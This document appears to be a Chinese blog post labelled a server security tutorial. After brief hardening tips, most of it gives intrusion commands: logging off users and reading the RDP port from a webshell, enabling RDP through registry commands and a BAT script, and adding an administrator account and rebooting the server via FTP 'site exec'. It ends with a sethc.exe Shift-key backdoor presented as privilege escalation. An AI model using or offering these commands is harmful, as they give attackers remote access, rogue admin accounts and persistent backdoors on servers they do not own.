服务器安全教程

时间:2023-01-31 18:15:34
【杂项技巧】服务器安全教程

服务器安全教程

一。更改服务器默认用户名

 

点开始菜单→运行gpedit.msc(组策略管理器)→计算机配置 →WINDOWS设置→安全设置→本地策略→安全选项→这里的最后一项→重命名系统管理员帐户(双击)→在本地策略设置里面输入你想要的用户名,然后确定就OK了。

 

二。更改服务器密码

要远程修改服务器的用户密码,方法有三,如下:

一、选择“我的电脑”-右键“管理”-“本地用户和组”-“用户”找到你的那个管理员账号,右键进行设置密码。那个提示WINDOWS的一个安全警告,并不影响你的使用。如果你真的担心数据丢失的话,那么建议你更改后就重启电脑,这样你在更改密码后的操作可以保证不会丢失。

二、开始->windows安全性->这样就如同在远程桌面同时按下
了CTRL+ATL+DEL的效果一样->点更改密码,只有这样NTFS文件系统的加密信息才不会丢失。

三、按Ctrl+alt+end键 而不是Ctrl+alt+delete键。

推荐使用第二和第三种方法,直接打开帐户管理然后修改密码,那是在忘记密码时才这样子做的。

 

三。webshell下注销系统用户方法

 

先输入查出用户的ID      query user
然后再输入注销该用户。 logoff id

 

四。CMD下开启3389命令

 

方法一:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

方法二:建立BAT文件,键入如下代码,在有执行权限的服务器运行!

 

echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

 

五。WEBSHELL下查看管理员将3389修改成了什么

 

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 这条命令是查看远程桌面连接所开的端口是多少 一般默认显示是0xd3d   也就是3389 。

其實兩個 常見的cmd命令就可以搞定下來·

先用
tasklist /svc

 

图像名                       PID 服务
========================= ====== =============================================
System Idle Process            0 暂缺
System                         4 暂缺
smss.exe                     704 暂缺
csrss.exe                    772 暂缺
winlogon.exe                 796 暂缺
services.exe                 840 Eventlog, PlugPlay
lsass.exe                    852 PolicyAgent, ProtectedStorage, SamSs
svchost.exe                 1028 DcomLaunch, TermService                              、//這裡TermService就是對應的3389服務,記下進程的PID:1028
svchost.exe                 1092 RpcSs
svchost.exe                 1180 AudioSrv, Browser, CryptSvc, Dhcp, dmserver,
                                 EventSystem, FastUserSwitchingCompatibility,
                                 LanmanServer, lanmanworkstation, Netman,
                                 Nla, RasMan, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, TapiSrv, Themes, TrkWks,
                                 W32Time, winmgmt, wscsvc, wuauserv, WZCSVC
svchost.exe                 1260 Dnscache
svchost.exe                 1336 LmHosts, SSDPSRV, WebClient
spoolsv.exe                 1416 Spooler
Explorer.EXE                1788 暂缺
vsnpstd3.exe                1948 暂缺
egui.exe                    1968 暂缺
ctfmon.exe                  2044 暂缺
ekrn.exe                     484 ekrn
svchost.exe                  604 stisvc
wdfmgr.exe                   620 UMWdf
alg.exe                      324 ALG
iexplore.exe                2552 暂缺
cmd.exe                     2236 暂缺
conime.exe                   124 暂缺
wmiprvse.exe                 292 暂缺
mstsc.exe                   3580 暂缺
tasklist.exe                 188 暂缺
====================================================================================================
然後使用netstat命令查看對應的端口號:

netstat /ano

 

Active Connections
Proto Local Address          Foreign Address        State           PID
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1092
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
TCP    0.0.0.0:5389           0.0.0.0:0              LISTENING       1028      //這裡的對應的上面的進程PID號1028,即是遠程桌面對應的端口5389.
TCP    60.xxx.xxx.xxx:1349     220.xxx.xxx.xxx:8081     TIME_WAIT       0
TCP    60..xxx.xxx.xxx::1360     121.xxx.xxx.xxx:8449       TIME_WAIT       0
TCP    60..xxx.xxx.xxx::1525     121.xxx.xxx.xxx:80       TIME_WAIT       0
TCP    127.0.0.1:1030         0.0.0.0:0              LISTENING       324
TCP    127.0.0.1:1522         127.0.0.1:30606        TIME_WAIT       0
TCP    127.0.0.1:30606        0.0.0.0:0              LISTENING       484
TCP    127.0.0.1:30606        127.0.0.1:1520         TIME_WAIT       0
TCP    192.168.1.12:139       0.0.0.0:0              LISTENING       4
UDP    0.0.0.0:445            *:*                                    4
UDP    0.0.0.0:500            *:*                                    852
UDP    0.0.0.0:4500           *:*                                    852
UDP    60.xxx.xxx.xxx::123      *:*                                    1180
UDP    60.xxx.xxx.xxx::1900     *:*                                    1336
UDP    127.0.0.1:123          *:*                                    1180
UDP    127.0.0.1:1047         *:*                                    2552
UDP    127.0.0.1:1900         *:*                                    1336
UDP    192.168.1.12:123       *:*                                    1180
UDP    192.168.1.12:137       *:*                                    4
UDP    192.168.1.12:138       *:*                                    4
UDP    192.168.1.12:1900      *:*                                    1336
C:\>

 

六.FTP下CMD系列命令

 

quote site exec net user 381400744 381400744 /add  添加用户

 

quote site exec net localgroup administrators 381400744 /add  把用户381400744 提升为管理员!

 

quote site exec   shutdown -r -t 0  远程重启服务器

 

quote site exec REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  远程开启3389端口

 

quote site exec tasklist /svc>>jilu.txt      这两句并用,远程查看管理员把3389端口修改成了多少,自动保存为名叫jilu.txt的文件!
       quote site exec netstat /ano>>jilu.txt


七,经典提权技巧总结

 

方法1.替换CMD和sethc直接利用SHIFT后门调用CMD

copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
       copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc.exe /y

进入登陆界面后:调用桌面    explorer

标签:

相关文章